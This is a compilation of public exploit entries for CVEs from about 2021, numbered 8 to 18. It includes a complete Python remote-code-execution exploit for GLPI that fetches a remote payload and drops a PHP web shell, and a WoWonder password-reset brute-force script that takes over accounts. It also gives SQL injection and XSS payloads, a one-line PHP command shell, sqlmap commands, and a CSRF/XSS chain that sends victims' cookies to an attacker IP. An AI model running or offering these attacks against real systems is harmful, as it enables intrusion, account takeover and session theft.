  8. # Exploit Title: Zenario CMS 8.8.52729 - 'cID' Blind & Error based SQL injection (Authenticated) # Date: 05-02-2021 # Exploit Author: Avinash R # Vendor Homepage: https://zenar.io/ # Software Link: https://github.com/TribalSystems/Zenario/releases/tag/8.8 # Version: 8.8.52729 # Tested on: Windows 10 Pro (No OS restrictions) # CVE : CVE-2021-27673 # Reference: https://deadsh0t.medium.com/blind-error-based-authenticated-sql-injection-on-zenario-8-8-52729-cms-d4705534df38 ##### Steps to Reproduce ##### 1) Log in to the admin page of Zenario CMS with admin credentials, which is http://server_ip/zenario/admin.php 2) Click New → HTML page to create a new sample page and intercept the request with an intercepting proxy. 3) A single quote in the 'cID' parameter is enough to confirm the SQL injection. 4) After confirming that the 'cID' parameter is vulnerable to SQL injection, feeding the request to SQLMAP will do the rest of the work for you. ############ End ############
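#!/usr/bin/env python3
# Exploit Title: GLPI 9.4.5 - Remote Code Execution (RCE)
# Exploit Author: Brian Peters
# Vendor Homepage: https://glpi-project.org
# Software Link: https://github.com/glpi-project/glpi/releases
# Version: < 9.4.6
# CVE: CVE-2020-11060
#
# Download a SQL dump and find the table offset for "wifinetworks" with
#     cat <sqlfile> | grep "CREATE TABLE" | grep -n wifinetworks
# and pass that number as --offset (default 312, the value the original PoC
# hard-coded in create_dump).
# The Nix/Win paths are based on defaults. You can use curl -I <url> and use
# md5sum to find the path based on the Set-Cookie hash.
#
# NOTE(review): the "comment" payload is downloaded at run time from a
# third-party GitHub repository.  Review it before use, or pass a local copy
# with --payload.  The download keeps normal certificate verification and never
# goes through the target session, whose TLS checks are disabled below.
import argparse
import json
import random
import re
import string
import sys
import time
from datetime import datetime

import requests
from lxml import html

# Gzip-alignment payload published with the original research (AlmondOffSec).
DEFAULT_PAYLOAD_URL = (
    "https://raw.githubusercontent.com/AlmondOffSec/PoCs/master/glpi_rce_gzip/poc.txt"
)
# "wifinetworks" table offset used by the original PoC; see the header.
DEFAULT_TABLE_OFFSET = 312
# String echoed back through the dropped shell to prove code execution.
RCE_MARKER = "asdfasdfasdf"
# Seconds before any HTTP call is abandoned, so a hung target cannot stall the loop.
DEFAULT_TIMEOUT = 30

_CSRF_RE = re.compile(r'name="_glpi_csrf_token" value="([a-f0-9]{32})"')
# Non-greedy attribute match: the original '(.*)' could swallow neighbouring markup.
_LOGIN_NAME_RE = re.compile(r'name="([^"]*)" id="login_name"')
_LOGIN_PASS_RE = re.compile(r'name="([^"]*)" id="login_password"')


class GlpiBrowser:
    """Authenticated GLPI session driving the CVE-2020-11060 chain.

    As implemented by the original PoC: store the payload in a WifiNetwork
    "comment" field, tune the record length with a growing ESSID padding,
    have backup.php write the SQL dump to ``<pics dir>/<shellname>`` and
    probe that file until it executes the echo marker.

    Args:
        url: Base URL of the GLPI install (trailing slash optional).
        user, password: Credentials of an account allowed to manage wifi
            networks and backups.
        platform: ``"Win"`` or ``"Nix"`` selects the default pics/ path the
            dump is written to; any other value writes ``shellname`` as a
            relative path, exactly as the original script did.
        payload_url: HTTP(S) URL or local file path of the comment payload.
        offset: ``offsettable`` value for backup.php (see module header).
        timeout: Per-request timeout in seconds.
    """

    # Default document-root pics/ directory per platform; anything else -> "".
    PICS_DIRS = {
        "Win": "C:\\xampp\\htdocs\\pics\\",
        "Nix": "/var/www/html/glpi/pics/",
    }

    def __init__(self, url, user, password, platform,
                 payload_url=DEFAULT_PAYLOAD_URL, offset=DEFAULT_TABLE_OFFSET,
                 timeout=DEFAULT_TIMEOUT):
        self.url = url.rstrip("/")
        self.user = user
        self.password = password
        self.platform = platform
        self.payload_url = payload_url
        self.offset = offset
        self.timeout = timeout
        self._payload = None  # filled by _load_payload() on first use
        self.session = requests.Session()
        # Lab targets commonly run self-signed certificates.  This only covers
        # requests to the target; the payload fetch in _load_payload() verifies.
        self.session.verify = False
        requests.packages.urllib3.disable_warnings()

    # -- low-level helpers -------------------------------------------------

    def _get(self, path, **kwargs):
        """GET ``<url>/<path>`` with the session timeout applied."""
        kwargs.setdefault("timeout", self.timeout)
        return self.session.get("{0}/{1}".format(self.url, path), **kwargs)

    def _post(self, path, data, **kwargs):
        """POST form ``data`` to ``<url>/<path>`` with the session timeout applied."""
        kwargs.setdefault("timeout", self.timeout)
        return self.session.post("{0}/{1}".format(self.url, path), data=data, **kwargs)

    def extract_csrf(self, page):
        """Return the 32-hex ``_glpi_csrf_token`` embedded in ``page``.

        Raises:
            ValueError: if the page carries no token (e.g. session expired).
        """
        match = _CSRF_RE.search(page)
        if match is None:
            raise ValueError("no _glpi_csrf_token found in page")
        return match.group(1)

    def _load_payload(self):
        """Return the comment payload bytes, fetching/reading them only once."""
        if self._payload is None:
            if self.payload_url.startswith(("http://", "https://")):
                # Deliberately plain requests.get, not self.session: certificate
                # verification stays on for this third-party download.
                r = requests.get(self.payload_url, timeout=self.timeout)
                r.raise_for_status()
                self._payload = r.content
            else:
                with open(self.payload_url, "rb") as fh:
                    self._payload = fh.read()
        return self._payload

    def _network_ids(self):
        """Return the ids of every WifiNetwork linked from the list page."""
        r = self._get("front/wifinetwork.php")
        page = html.fromstring(r.content)
        return [href.split("=")[-1]
                for href in page.xpath("//a/@href")
                if "wifinetwork.form.php?id=" in href]

    def _form_csrf(self, network_id):
        """Open the edit form of ``network_id`` and return the CSRF token it renders.

        A fresh token is taken per write (as the original edit step did)
        instead of reusing one list-page token for several deletes.
        """
        r = self._get("front/wifinetwork.form.php?id={0}".format(network_id))
        return self.extract_csrf(r.text)

    @staticmethod
    def _network_form(comment, essid, datemod, **action):
        """Build the wifinetwork.form.php POST body; ``action`` adds add/update/purge fields."""
        data = {
            "entities_id": "0",
            "is_recursive": "0",
            "name": "PoC",
            "comment": comment,
            "essid": essid,
            "mode": "ad-hoc",
            # Sent with every form post, as the original PoC did.
            "_read_date_mod": datemod,
        }
        data.update(action)
        return data

    # -- exploit steps -----------------------------------------------------

    def get_login_data(self):
        """Fetch the login page; return (username field, password field, csrf token).

        Raises:
            ValueError: if any of the three cannot be found in the page.
        """
        r = self.session.get(self.url, allow_redirects=True, timeout=self.timeout)
        csrf_token = self.extract_csrf(r.text)
        name_field = _LOGIN_NAME_RE.search(r.text)
        pass_field = _LOGIN_PASS_RE.search(r.text)
        if name_field is None or pass_field is None:
            raise ValueError("login form fields not found")
        return name_field.group(1), pass_field.group(1), csrf_token

    def login(self):
        """Authenticate; return True when GLPI answers with a 302 (its post-login redirect)."""
        try:
            name_field, pass_field, csrf_token = self.get_login_data()
        except Exception:
            print("[-] Login error: could not retrieve form data")
            sys.exit(1)
        data = {
            name_field: self.user,
            pass_field: self.password,
            "auth": "local",
            "submit": "Post",
            "_glpi_csrf_token": csrf_token,
        }
        r = self._post("front/login.php", data, allow_redirects=False)
        return r.status_code == 302

    def wipe_networks(self, padding, datemod):
        """Purge every existing WifiNetwork (the original PoC does this before each attempt)."""
        comment = self._load_payload()
        for network_id in self._network_ids():
            try:
                csrf_token = self._form_csrf(network_id)
            except Exception:
                print("[-] Edit network error: could not retrieve form data")
                sys.exit(1)
            print("Deleting network " + network_id)
            data = self._network_form(
                comment, "RCE" + padding, datemod,
                purge="Delete permanently", id=network_id,
                _glpi_csrf_token=csrf_token)
            self._post("front/wifinetwork.form.php", data)

    def create_network(self, datemod):
        """Create the "PoC" network carrying the payload in its comment field."""
        comment = self._load_payload()
        r = self._get("front/wifinetwork.php")
        try:
            csrf_token = self.extract_csrf(r.text)
        except Exception:
            print("[-] Create network error: could not retrieve form data")
            sys.exit(1)
        data = self._network_form(comment, "RCE", datemod, add="ADD",
                                  _glpi_csrf_token=csrf_token)
        self._post("front/wifinetwork.form.php", data)
        print("[+] Network created")
        print("    Name: PoC")
        print("    ESSID: RCE")

    def edit_network(self, padding, datemod):
        """Re-save every network with ESSID ``"RCE" + padding`` to shift the dump layout."""
        comment = self._load_payload()
        for network_id in self._network_ids():
            try:
                csrf_token = self._form_csrf(network_id)
            except Exception:
                print("[-] Edit network error: could not retrieve form data")
                sys.exit(1)
            data = self._network_form(
                comment, "RCE" + padding, datemod,
                update="Save", id=network_id, _glpi_csrf_token=csrf_token)
            self._post("front/wifinetwork.form.php", data)
            print("[+] Network modified")
            print("    New ESSID: RCE" + padding)

    def create_dump(self, shellname):
        """Ask backup.php to write the SQL dump to ``<pics dir>/<shellname>``."""
        path = self.PICS_DIRS.get(self.platform, "")
        self._get("front/backup.php", params={
            "dump": "dump",
            "offsettable": self.offset,
            "fichier": path + shellname,
        })
        print("[+] Shell: {0}/pics/{1}".format(self.url, shellname))

    def shell_check(self, shellname):
        """Probe the dropped file; return True when it echoes the marker back."""
        r = self._get("pics/{0}?0=echo%20{1}".format(shellname, RCE_MARKER))
        print("    Shell size: " + str(len(r.content)))
        if RCE_MARKER in r.text:
            print("[+] RCE FOUND!")
            return True
        return False

    @staticmethod
    def random_shell_name():
        """Return an ``<8 letters>.php`` name drawn from OS entropy, not the default PRNG."""
        rng = random.SystemRandom()
        return "".join(rng.choice(string.ascii_letters) for _ in range(8)) + ".php"

    def pwn(self):
        """Run the chain, growing the ESSID padding each round until the shell answers."""
        if not self.login():
            print("[-] Login error")
            return
        print("[+] Logged in")
        datemod = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
        tick = 1
        while True:
            shellname = self.random_shell_name()
            # "1", "12", "123", ... - the padding grows with every attempt.
            padding = "".join(str(i) for i in range(1, tick + 1))
            self.wipe_networks(padding, datemod)
            self.create_network(datemod)
            self.edit_network(padding, datemod)
            self.create_dump(shellname)
            if self.shell_check(shellname):
                return
            print("\n")
            input("Press any key to continue with the next iteration...")
            tick += 1


def main():
    """Parse the command line and run the exploit."""
    parser = argparse.ArgumentParser(
        description="GLPI < 9.4.6 authenticated RCE (CVE-2020-11060)")
    parser.add_argument("--url", help="Target URL", required=True)
    parser.add_argument("--user", help="Username", required=True)
    parser.add_argument("--password", help="Password", required=True)
    parser.add_argument("--platform", help="Win/Nix", required=True)
    parser.add_argument("--offset", type=int, default=DEFAULT_TABLE_OFFSET,
                        help="offsettable value for backup.php (default %(default)s)")
    parser.add_argument("--payload", default=DEFAULT_PAYLOAD_URL,
                        help="URL or local path of the comment payload")
    args = parser.parse_args()
    g = GlpiBrowser(args.url, user=args.user, password=args.password,
                    platform=args.platform, payload_url=args.payload,
                    offset=args.offset)
    g.pwn()


if __name__ == "__main__":
    main()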
10. # Exploit Title: Accela Civic Platform 21.1 - 'contactSeqNumber' Insecure Direct Object References (IDOR)
# Software Link: https://www.accela.com/civic-platform/
# Version: <= 21.1
# Author: Abdulazeez Alaseeri
# Tested on: JBoss server/windows
# Type: Web App
# Date: 07/06/2021
# CVE: CVE-2021-34369

================================================================
Accela Civic Platform Insecure Direct Object References <= 21.1
================================================================
This vulnerability allows an authenticated attacker to view other users' contact data by manipulating the value of the contactSeqNumber parameter: the server does not check that the requested record belongs to the caller.
================================================================
Request Headers start
================================================================
GET /portlets/contact/ref/refContactDetail.do?mode=view&lookup=false&contactSeqNumber=848693&module=Licenses HTTP/1.1
Host: Hidden
Cookie: JSESSIONID=JurAf5eB5CcOPy-yB6_vyjysPwt5sJYWY--BWa7Y.civpnode; BIGipServerAccela_Automation_av.web_pool_PROD=1427686922.47873.0000; AAPersistLoginServProvCode=SAFVC; ACSignOnModule=SSOStandard; JSESSIONID=1bQKqPNdLWUadMJTDGeZOsBnei77VrC5stuwC8-K.civpnode; LASTEST_REQUEST_TIME=1623211660218; LoginServProvCode4MultiAgency=SAFVC; LoginUsername4MultiAgency=E0BD5838A6E2B0C4; hostSignOn=true; UUID=a849376e-f27f-4c73-91d1-3181bad7688d; ACSignoff="Hidden"; ACSwitchAgency="Hidden"; LATEST_LB=1427686922.47873.0000; LATEST_SESSION_ID=JurAf5eB5CcOPy-yB6_vyjysPwt5sJYWY--BWa7Y; LATEST_WEB_SERVER=10.198.24.86; g_current_language_ext=en_US; ACAuth=77040226932997938167623031760043758249275936032481641290563022545358808190678048903667802506479617333124770883197855794745875802
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close
================================================================
Request Headers end
================================================================

================================================================
Response Headers start
================================================================
HTTP/1.1 200 OK
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
X-Powered-By: JSP/2.3
Set-Cookie: LASTEST_REQUEST_TIME=1623211780357; path=/; domain=.hidden; secure
Set-Cookie: LATEST_LB=1427686922.47873.0000; path=/; domain=.hidden; secure
Set-Cookie: LATEST_SESSION_ID=JurAf5eB5CcOPy-yB6_vyjysPwt5sJYWY--BWa7Y; path=/; domain=.hidden; secure
Set-Cookie: LATEST_WEB_SERVER=10.198.24.86; path=/; domain=.hidden; secure
X-XSS-Protection: 0
Pragma: No-cache
X-UA-Compatible: IE=EDGE
Date: Wed, 09 Jun 2021 04:09:40 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 98126
================================================================
Response Headers end
================================================================

Changing the contactSeqNumber value returns valid contact details belonging to another user, which confirms the IDOR. The identifier appears to be a plain sequential number, so other records can be enumerated simply by incrementing it.
11. # Exploit Title: Accela Civic Platform 21.1 - 'successURL' Cross-Site-Scripting (XSS)
# Software Link: https://www.accela.com/civic-platform/
# Version: <= 21.1
# Author: Abdulazeez Alaseeri
# Tested on: JBoss server/windows
# Type: Web App
# Date: 07/06/2021
# CVE-2021-34370

================================================================
Accela Civic Platform Cross-Site-Scripting and Open Redirect <= 21.1
================================================================
The successURL parameter of /ssoAdapter/logoutAction.do is reflected unencoded into a JavaScript redirect in the response, which yields reflected cross-site scripting, or an open redirect when a plain URL is supplied.
================================================================
Request Headers start
================================================================
GET /ssoAdapter/logoutAction.do?servProvCode=SAFVC&successURL=%27^alert`1`^%27 HTTP/1.1
Host: Hidden
Cookie: JSESSIONID=bjmCs2TMr3RzVGT28iJafk0vRpZcd2uO0QVlR7K9.civpnode; BIGipServerAccela_Automation_av.web_pool_PROD=1360578058.47873.0000; LASTEST_REQUEST_TIME=1623056446126; LATEST_LB=1360578058.47873.0000; LATEST_SESSION_ID=xWGsssz3eS1biQdST9lnfkxyMMUp2q3HLR75bGaX; LATEST_WEB_SERVER=10.198.24.82; UUID=35e180c4-bde4-48e3-876f-0f32c6e85d5c; JSESSIONID=***************************; g_current_language_ext=en_US; hostSignOn=true
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close
================================================================
Request Headers end
================================================================

================================================================
Response Headers start
================================================================
HTTP/1.1 200 OK
Connection: close
Set-Cookie: JSESSIONID=8qVANwRg4mQWxQ6vAuZOxtv7OEhEMbEXJdc2CzTY.civpnode; path=/ssoAdapter
X-XSS-Protection: 0
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 73
Date: Tue, 08 Jun 2021 10:41:59 GMT
<script type='text/javascript'>document.location=''^alert`1`^''</script>
================================================================
Response Headers end
================================================================

The successURL value lands verbatim inside the document.location='...' assignment in the response body, so the leading %27 closes the JavaScript string literal and the remainder is executed as script (the response also disables the browser XSS filter with X-XSS-Protection: 0).

Payload: %27^alert`1`^%27
For the open redirect, supply an absolute URL of your choice as successURL instead of the script payload.
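#!/usr/bin/env python3
# Exploit Title: WoWonder Social Network Platform 3.1 - Authentication Bypass
# Date: 11.06.2021
# Exploit Author: securityforeveryone.com
# Researchers : Security For Everyone Team - https://securityforeveryone.com
# Vendor Homepage: https://www.wowonder.com/
# Software Link: https://codecanyon.net/item/wowonder-the-ultimate-php-social-network-platform/13785302
# Version: < 3.1
# Tested on: Linux/Windows

"""
DESCRIPTION

In WoWonder < 3.1, remote attackers can take over any account due to the weak
cryptographic algorithm in recover.php: the "code" parameter of the password
reset link is an md5 of the current unix time and a random value between 111
and 999, so it is easily predicted from the time of day.

This script requests a password reset for a registered e-mail address, takes
the unix time from the server's Date response header, and tries the 889
possible codes for that second (and, by default, for a couple of neighbouring
seconds as well, because the Date header is stamped when the response is sent,
which can be a second or two after the code was generated, e.g. while the
reset e-mail is being delivered).  The first code the reset page accepts is
then used to set a new password.

NOTE: this really changes the target account's password; only run it against
accounts you are authorised to test.

ABOUT SECURITY FOR EVERYONE TEAM

We are a team that has been working on cyber security in the industry for a
long time. In 2020, we created securityforeveryone.com where everyone can test
their website security and get help to fix their vulnerabilities.

We have many free tools that you can use here:
https://securityforeveryone.com/tools/free-security-tools
"""

import argparse
import calendar
import email.utils as eut
import hashlib
import re
import sys
import time

import requests

DEFAULT_URL = "http://wowonderlab:80/wowonder/"          # change this with your target
DEFAULT_EMAIL = "wowondertest@securityforeveryone.com"   # a registered WoWonder e-mail address
DEFAULT_PASSWORD = "10711071"                             # password set once the code is found
# Prefix of the reset "code"/"id" value.  The original PoC used "1_";
# NOTE(review): this looks like the target user's numeric id - confirm against
# recover.php before pointing the script at another account.
DEFAULT_ID_PREFIX = "1_"
# Seconds either side of the Date header to try (0 = exactly the original behaviour).
DEFAULT_WINDOW = 2
# Per-request timeout so a stalled target cannot hang the brute force.
TIMEOUT = 15

HEADERS = {
    "X-Requested-With": "XMLHttpRequest",
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    "Connection": "close",
}
# The random component is a value between 111 and 999 -> 889 candidates.
TOKEN_RANGE = range(111, 1000)


def reset_code(token, epoch):
    """Return WoWonder's reset code for ``token`` and unix time ``epoch``: md5("<token><epoch>")."""
    return hashlib.md5("{0}{1}".format(token, epoch).encode()).hexdigest()


def candidate_epochs(center, window):
    """Yield ``center`` first, then center-1, center+1, ... out to +/- ``window``.

    Ordered so the most likely second (the one in the Date header) is tried
    first; ``window=0`` yields only ``center``.
    """
    yield center
    for delta in range(1, window + 1):
        yield center - delta
        yield center + delta


def response_epoch(date_header):
    """Convert an RFC 2822 ``Date`` header (GMT) to a unix timestamp.

    Raises:
        ValueError: if the header cannot be parsed.
    """
    parsed = eut.parsedate(date_header)
    if parsed is None:
        raise ValueError("unparseable Date header: {0!r}".format(date_header))
    return calendar.timegm(parsed)


def find_reset_code(url, epoch, window=DEFAULT_WINDOW, id_prefix=DEFAULT_ID_PREFIX):
    """Brute-force the reset code around ``epoch``; return the accepted md5 or None.

    A code counts as accepted when the reset page renders its "New password"
    form.  One GET per candidate, so expect 889 * (2 * window + 1) requests
    in the worst case.
    """
    for candidate in candidate_epochs(epoch, window):
        for token in TOKEN_RANGE:
            code = reset_code(token, candidate)
            r = requests.get(
                url + "index.php?link1=reset-password&code={0}{1}".format(id_prefix, code),
                timeout=TIMEOUT)
            if "New password" in r.text:
                return code
    return None


def main():
    """Request a reset, recover the code and set ``--password`` on the account."""
    parser = argparse.ArgumentParser(
        description="WoWonder < 3.1 password-reset code prediction")
    parser.add_argument("--url", default=DEFAULT_URL,
                        help="target base URL (default %(default)s)")
    parser.add_argument("--email", default=DEFAULT_EMAIL,
                        help="registered e-mail address of the target account")
    parser.add_argument("--password", default=DEFAULT_PASSWORD,
                        help="new password to set on the account")
    parser.add_argument("--id-prefix", default=DEFAULT_ID_PREFIX,
                        help="prefix of the reset code (default %(default)s)")
    parser.add_argument("--window", type=int, default=DEFAULT_WINDOW,
                        help="seconds either side of the Date header to try (default %(default)s)")
    args = parser.parse_args()
    url = args.url if args.url.endswith("/") else args.url + "/"

    req = requests.post(url + "requests.php?f=recover", headers=HEADERS,
                        data={"recoveremail": args.email}, timeout=TIMEOUT)
    if "Date" not in req.headers:
        sys.exit("[-] No Date header in the recover response; cannot recover the timestamp")
    epoch = response_epoch(req.headers["Date"])
    print("[*] Reset requested at server time {0}; trying up to {1} candidate codes".format(
        epoch, len(TOKEN_RANGE) * (2 * args.window + 1)))

    code = find_reset_code(url, epoch, window=args.window, id_prefix=args.id_prefix)
    if code is None:
        sys.exit("[-] No valid reset code found; try a larger --window")
    print(code)

    resetdata = {"password": args.password, "id": args.id_prefix + code}
    reqtoken = requests.post(url + "requests.php?f=reset_password", headers=HEADERS,
                             data=resetdata, timeout=TIMEOUT)
    print(reqtoken.headers.get("Set-Cookie", "[-] no Set-Cookie header in the reset response"))


if __name__ == "__main__":
    main()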
13. # Exploit Title: COVID19 Testing Management System 1.0 - 'State' Stored Cross-Site-Scripting (XSS)
# Date: 11/06/2021
# Exploit Author: BHAVESH KAUL
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Server: XAMPP

# Description #
COVID19 Testing Management System 1.0 is vulnerable to stored cross-site scripting because user-supplied data is not sanitized. The 'State' field of the new-user registration form, which needs no login, accepts a script payload; the application stores it in the database and it fires every time the live test updates page (the dashboard) is viewed, so an anonymous visitor can run JavaScript in the browser of anyone who opens that page.

# Proof of Concept (PoC) : Exploit #
1) Go to: http://localhost/covid-tms/new-user-testing.php
2) Enter the following payload in the 'State' parameter: <script>alert(1)</script>
3) Fill out the other fields and submit the form
4) Now go to: http://localhost/covid-tms/live-test-updates.php
5) The stored XSS payload fires

# Image PoC : Reference Image #
1) Vulnerable Parameter: https://ibb.co/1vyNM2w
2) Payload Fired: https://ibb.co/CsfPnXK
14. # Exploit Title: Spy Emergency 25.0.650 - Unquoted Service Path
# Discovery by: Erick Galindo
# Discovery Date: 2021-06-11
# Vendor Homepage: https://www.spy-emergency.com/
# Software Link: https://www.spy-emergency.com/download/download.php?id=1
# Tested Version: 25.0.650.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Pro x64 es

# Step to discover Unquoted Service Path:
C:>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "SpyEmrg"| findstr /i /v """
Spy Emergency Health Check    SpyEmrgHealth  C:\Program Files\NETGATE\Spy Emergency\SpyEmergencyHealth.exe  Auto
Spy Emergency Engine Service  SpyEmrgSrv     C:\Program Files\NETGATE\Spy Emergency\SpyEmergencySrv.exe     Auto

# Service info
C:>sc qc "SpyEmrgHealth"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: SpyEmrgHealth
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files\NETGATE\Spy Emergency\SpyEmergencyHealth.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : Spy Emergency Health Check
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem

# Service info
C:\>sc qc "SpyEmrgSrv"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: SpyEmrgSrv
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files\NETGATE\Spy Emergency\SpyEmergencySrv.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : Spy Emergency Engine Service
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem

#Exploit:
Both services start automatically as LocalSystem from an unquoted path that contains spaces, so at service start Windows may try C:\Program.exe and C:\Program Files\NETGATE\Spy.exe before the real binary. A local user who can write to one of those locations (not granted to standard users by default - check the ACLs on C:\ and C:\Program Files\NETGATE\) could plant such an executable and have it run as SYSTEM at the next reboot or service restart.
15. # Exploit Title : TextPattern CMS 4.8.7 - Remote Command Execution (Authenticated)
# Date : 2021/09/06
# Exploit Author : Mert Daş merterpreter@gmail.com
# Software Link : https://textpattern.com/file_download/113/textpattern-4.8.7.zip
# Software web : https://textpattern.com/
# Tested on: Server : Xampp

An authenticated user with access to the Content → Files panel can upload a file with a .php extension. The file is stored under /textpattern/files/ and is executed by the web server when requested, so the upload acts as a web shell. The shell used here contains this code:

<?PHP system($_GET['cmd']);?>

1) Go to the Content section.
2) Click Files and upload the malicious PHP file.
3) Request yourserver/textpattern/files/yourphp.php?cmd=<command>

After uploading the file, the request and response look like this:

Request:
GET /textpattern/files/cmd.php?cmd=whoami HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: txp_login_public=18e9bf4a21admin; language=en-gb; currency=GBP; PHPSESSID=cctbu6sj8571j2t6vp7g8ab7gi
Upgrade-Insecure-Requests: 1

Response:
HTTP/1.1 200 OK
Date: Thu, 10 Jun 2021 00:32:41 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.20
X-Powered-By: PHP/7.4.20
Content-Length: 22
Connection: close
Content-Type: text/html; charset=UTF-8

pc\mertdas
16. # Exploit Title: Small CRM 3.0 - 'Authentication Bypass' SQL Injection
# Date: 12/06/2021
# Exploit Author: BHAVESH KAUL
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/small-crm-php/
# Version: 3.0
# Tested on: Server: XAMPP

# Description #
Small CRM 3.0 is vulnerable to SQL injection on its admin login form: the submitted username and password are placed into the login query without sanitization, so a tautology such as ' OR 'x'='x makes the query match and logs the attacker in without valid credentials. Anyone who can reach the admin login panel can therefore take over the admin account.

# Proof of Concept (PoC) : Exploit #
1) Go to: http://localhost/crm/admin/
2) Enter the following payload in both the 'Username' and 'Password' fields: ' OR 'x'='x
3) The SQL injection succeeds and you are logged in as admin
17. # Exploit Title: Stock Management System 1.0 - 'user_id' Blind SQL injection (Authenticated)
# Date: 11/06/2021
# Exploit Author: Riadh Benlamine (rbn0x00)
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/sites/default/files/download/Warren%20Daloyan/stock.zip
# Version: 1.0
# Category: Webapps
# Tested on: Apache2+MariaDB latest version

# Description :
Stock Management System suffers from a blind SQL injection in '/stock/php_action/changePassword.php' because the 'user_id' POST parameter is used in the SQL query without sanitization. Depending on the privileges of the database account (the --is-dba check below tells you), this may be escalated beyond data extraction, e.g. to remote code execution.

- Vulnerable parameter: user_id=<injection point>

SQLmap command:
--------------
sqlmap -u http://<target_host>/stock/php_action/changePassword.php --data="password=invalidpassword&npassword=test&cpassword=test&user_id=1*" --cookie="PHPSESSID=<your cookie>" --is-dba

SQLmap Output:
-------------
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: password=invalidpassword&npassword=test&cpassword=test&user_id=(SELECT (CASE WHEN (7792=7792) THEN 1 ELSE (SELECT 5315 UNION SELECT 6564) END))

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: password=invalidpassword&npassword=test&cpassword=test&user_id=1 AND (SELECT 8344 FROM (SELECT(SLEEP(5)))RdSH)

Trick:
-----
The injection needs a valid session. A logged-in user's cookie can be stolen by chaining CSRF against changeUsername.php with a stored XSS in the username (this only works while the PHPSESSID cookie is not flagged HttpOnly, since the payload reads document.cookie):

<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http://<YOUR_TARGET>/stock/php_action/changeUsername.php" method="POST">
      <input type="hidden" name="username" value=""><script> alert(document.cookie); var i=new Image; i.src="http://<YOUR_IP>:<YOUR_PORT>/?"+document.cookie; </script>" />
      <input type="hidden" name="user&#95;id" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

and then use the cookie to perform the SQL injection :)
18. # Exploit Title: WibuKey Runtime 6.51 - 'WkSvW32.exe' Unquoted Service Path
# Discovery by: Brian Rodriguez
# Date: 13-06-2021
# Vendor Homepage: https://www.wibu.com
# Software Links: https://www.wibu.com/us/support/user/downloads-user-software/file/download/5792.html
# Tested Version: 6.51
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 10 Enterprise

# Step to discover Unquoted Service Path:
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
WIBU-KEY Server  WkSvW32.exe  C:\PROGRAM FILES (X86)\WIBUKEY\SERVER\WkSvW32.exe  Auto

C:\Users\IEUser>sc qc WkSvW32.exe
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: WkSvW32.exe
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\PROGRAM FILES (X86)\WIBUKEY\SERVER\WkSvW32.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : WIBU-KEY Server
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

# Exploit:
The service starts automatically as LocalSystem from an unquoted path that contains spaces, so at service start Windows may try C:\PROGRAM.exe and C:\PROGRAM FILES.exe before the real binary. A local user who can write to C:\ (not granted to standard users by default - check the ACLs) could plant such an executable and have it run as SYSTEM at the next reboot or service restart.
